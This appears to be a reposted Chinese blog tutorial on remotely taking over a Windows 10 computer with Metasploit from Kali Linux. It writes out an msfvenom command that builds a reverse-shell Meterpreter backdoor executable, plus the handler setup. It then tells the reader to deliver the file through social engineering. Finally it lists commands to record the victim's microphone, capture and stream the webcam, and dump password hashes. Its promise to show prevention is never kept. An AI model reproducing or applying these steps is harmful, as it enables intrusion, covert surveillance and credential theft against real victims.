当涉及到渗透和黑客攻击时，Linux就在那里。Kali Linux是功能最强大的Linux版本之一，为所有渗透测试工具提供了动力。Metasploit是最受欢迎的工具之一，可用于入侵包括计算机，Web服务器甚至手机在内的远程设备。在Metasploit的帮助下，入侵远程计算机并不难。Metasploit是终端命令库程序。对于初学者来说，很难知道命令以及如何执行它们。因此，如果您是新手，则可以学习最常见的Metasploit命令以开始使用。

注意： 向您展示黑客如何侵入远程系统以及如何防止它们。

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

要求：

Kali Linux操作系统

Metasploit框架（已在Kali Linux中预构建）

目标机

黑客入侵Windows 10计算机的演示是在虚拟环境中进行的，这意味着在此过程中不会损害任何实际设备。

如果要在VirtualBox中尝试，则还需要满足以下条件：

虚拟盒子

Kali Linux VM映像

Windows 10虚拟映像

目标机

远程入侵计算机的步骤如下：

下载并安装Kali linux。

安装完成后，启动系统并进行升级。只需打开一个终端并输入以下命令：

apt-get upgrade

更新后，运行metasploit。打开终端，然后键入：msfconsole。 

当Metasploit开始时，第一件事就是创建一个后门。输入以下命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.5 -f exe -o /root/Desktop/AnyName.exe

将LHOST = 10.0.2.5替换为您的内部IP。您可以通过在终端中键入' ifconfig'进行检查。您可以将保存后门的位置更改为任意选择 我是在桌面上创建的。

下一步是使用漏洞利用程序。该漏洞处理程序将处理所有后门请求。为此，只需键入以下命令。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

漏洞利用处理程序准备就绪后，只需设置漏洞利用选项即可。

设置侦听主机IP和端口后，只需键入以下命令即可利用。

exploit -j -z

现在是传播后门的一部分。在这里成为一名社会工程师。只需很少的社会工程学，即可将目标安装在PC上。当有人运行您发送的后门时。会话将在您的Metasploit终端中开始，而您正在…

现在该玩目标设备了。现在，您可以播放受害设备并对其执行任何操作。您可以在远程设备上执行数百种操作。以下是您可以在目标设备上执行的一些最有趣的操作。

远程操作的Meterpreter命令

record_mic

此命令提供您所连接的远程计算机的实时麦克风源。聆听目标的实时对话。

webcam_chat

它启动与目标计算机的视频聊天

webcam_snap

用于从目标设备捕获照片。

webcam_stream

用于从受害者计算机流式传输实时视频。

hashdump

它转储SAM数据库的内容。

您可以检出所有最常见的Metasploit命令和meterpreter有效负载。

希望这对您有用，并使您清楚如何使用Metasploit MSFVenom远程入侵计算机。如果您遇到任何问题，请在下面发表评论。

原文转自→→→路人博客